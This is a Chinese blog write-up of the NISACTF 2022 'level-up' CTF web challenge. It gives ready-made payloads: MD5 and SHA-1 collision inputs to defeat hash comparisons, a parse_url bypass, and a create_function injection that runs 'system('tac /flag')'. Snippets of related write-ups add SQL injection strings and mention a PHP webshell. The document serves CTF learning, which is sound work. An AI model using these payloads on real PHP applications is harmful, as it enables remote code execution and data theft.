[NISACTF 2022]level-up

最新推荐文章于 2024-05-27 22:03:30 发布
最新推荐文章于 2024-05-27 22:03:30 发布
阅读量541 收藏 2
点赞数
文章标签: php 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_70819573/article/details/129393427
版权

1.又是套娃,php审计。

第一层:

查看网页源码,有disallow,盲猜robots.txt伪协议


进入第二层:

 第二层和第三层可以放到一起讲,md5和sha1的强类型比较,可以用数组绕过,但这里不行,两个变量被转化成string类型了,所以考虑穷举,直接上payload:

md5:

a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2

sha1:

 array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

第四层:

关于parse_url可以用///绕过,构造极不合理的url会使其返回false,再者,由于php的特性,所有的. [+ 会转化成_,但可以先传入[避免。

payload:

http://1.14.71.254:28023///level_level_4.php?NI_SA_=txw4ever

 第五层:

<?php
//sorry , here is true last level
//^_^
error_reporting(0);
include "str.php";
 
$a = $_GET['a'];
$b = $_GET['b'];
if(preg_match('/^[a-z0-9_]*$/isD',$a)){
    show_source(__FILE__);
}
else{
    $a('',$b);
}

有明显的传参()提示,用create_function绕过。

create_function(传入的参数,执行函数)
内在的运行逻辑:
function(参数){
执行函数;
}

所以有payload:

?a=\create_function&b=}system('tac /flag');//‘\’绕过正则匹配,}用来闭合前面的函数

ha0cker
关注
[NISACTF 2022]hardsql - quine注入
oZuoShen123的博客
10-05 763
题目描述:`$password=$_POST['passwd']; $sql="SELECT passwd FROM users WHERE username='bilala' and passwd='$password';";` 从描述看出是quine注入,且用户名要是bilala 1、经测试,参数为:username=&passwd=&login=登录,username必须为bilala 2、【= and 空格】被过滤【like or /**/】 3、参考文章:https://blog.csdn.ne
[NISACTF 2022]
snowlyzz的博客
09-09 6460
NISACTF部分WP
NSS [NISACTF 2022]level-up
Jay17的博客
04-12 951
NSS [NISACTF 2022]level-up
[NISACTF 2022]easyssrf、[NISACTF 2022]level-up
最新发布
2401_82985722的博客
05-27 1272
php的数组在进行string强制转换时,会将数组转换为NULL类型 null=null成立,没有绕过去。: 是 PHP 内置函数之一,用于解析 URL 字符串,将其拆分为不同的组成部分,可以获取协议、主机名、端口号、路径、查询参数等信息。函数读文件,故可以用 php://filter伪协议 读取源代码并进行base64编码输出。用于获取指定字符串A在另一个字符串B中首次出现的位置,并返回从字符串B到末尾的所有字符串。匹配任何不可见字符,/D如果以$限制结尾字符,则不允许结尾有换行。
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
[NISACTF 2022]level-up wp
Leaf_initial的博客
04-12 940
好题!上来显示nothing here但是通过查看源码可以知道有Disallow指令,说明有robots.txt文件,直接访问 Disallow指令例如,如果一个网站有一个包含私人信息的目录,如 /private,但不希望搜索引擎抓取这个目录下的内容,就可以在 robots.txt 文件中使用 Disallow 指令来限制访问,如下所示: 找到了level2,直接访问,然后开始代码审计 这里一开始想用数组绕过,但是返回????说明在弱比较的时候就寄了,没办法,只能用md5强碰撞,构造payload(这里用h
[NISACTF 2022]上
qq_62046696的博客
07-26 5403
php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
[NISACTF 2022]level-uplevel5的wp
weixin_45446164的博客
07-17 214
然后$a在else里面可以使用create_function来创建一个匿名函数,在b使用vardump来打印变量中的详情信息,在vardump使用scandir函数来扫描目录然后使用/*来注释掉后面的代码最后的payload。接下来在更改scandir为file_get_contents()读取文件的内容并返回其内容作为字符串 读取根目录的flag。这个表示首字符(^ 表示匹配字符串的起始位置。)不能用a-z或者下划线,所以使用\来绕过。这道题看了很久没看通,最后看别的师傅的wp感觉打开了新思路。
NISACTF_WriteUp
The code way of kinnisoy
03-28 1万+
WriteUp 文章目录WriteUpWEBcheckinlevel-upis secretPWNReorPwn?CRYPTOsign_cryptofunnycaesernormalxorMISC签到huaji?bqtwhere_is_here不愉快的地方福利题问卷 WEB checkin 题目: 以为白给题,结果输入不对,f12查看源码。发现一些奇怪的东西: down了源码,本地打开复制‮⁦Ugeiwo⁩⁦cuishiyuan Payload: http://120.27.195.236:28990/
[NISACTF 2022]bingdundun~
qq_64201116的博客
07-11 2462
详细教学,手把手解决为什么phar生成报错,为什么连不上你的木马
[NISACTF 2022]checkin
qq_40567274的博客
04-08 5101
[NISACTF 2022] 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 提示:以下是本篇文章正文内容,下面案例可供参考 题目-join-us -1' || (select*from aa)# -1'||extractvalue(1,concat(0x5c,(select group_concat(table_name)from information_schema.tables where table_schema like 'sqlsql')))# -1' || extrac
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 5376
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 5010
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
NISACTF2023 WP
qq_41252520的博客
04-16 673
2年多没玩CTF了,pwn显得手生了不少,我的PWN环境已经在硬盘的某个角落里吃灰了。今天参加了一场校赛,捣鼓了一下午,Reverse和PWN都AK了。其实比赛是新手向,没啥难度,不过有道PWN设计的比较巧妙,got了两个tips,也就是今天将要分享的。
2022NISACTF
unexpectedthing的博客
07-13 1779
NISACTF
[NISACTF 2023]
rev1ve的博客
04-19 441
解释:先获得所有已定义的变量,指的是$_GET,再返回一个数组中正被内部指针指向的元素,多传一个get参数,end() 函数用来将数组的内部指针指向最后一个元素,eval执行。还有一个current() 函数,可以返回一个数组中正被内部指针指向的元素,在题目这里就是$_GET。这里要用到php的特性函数get_defined_vars(),可以获得所有已定义的变量,包括$去echo我们的命令,去提权让所有人能执行flag文件的权限。零宽度字符在通常情况下,在一般的文本编辑器中是不可见的。
[NISACTF 2022]bingdundun wp
Leaf_initial的博客
04-14 629
这里大部分人可能会报错,这个错误信息表示在运行phar.php文件时,创建归档文件“exp.phar”的功能被禁用了。由于我一直报错,不能生成文件,改了也没有用,所以找到了第二种解决办法,在php文件的目录下打开cmd,然后命令行输入。(但是不知道为什么我的phpinfo信息不能显示,于是重新上传了一个,变量名改了一下,改成了8,就可以了)可以看到example.phar压缩文件中有phar.php文件,里面有一个php代码,内容是一句话木马。连接成功,在根目录中的flag文件找到了flag,结束。
掌握Java编程:Level-Up Java源码全解析
标题“levelupjava-wiki:包含‘Level-Up Java’的所有源代码”表明这是一个包含Java编程学习资源的项目,名为“Level-Up Java”,它可能是一个教程、课程、或是一个开源的代码库,旨在帮助学习者或开发者通过实例...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值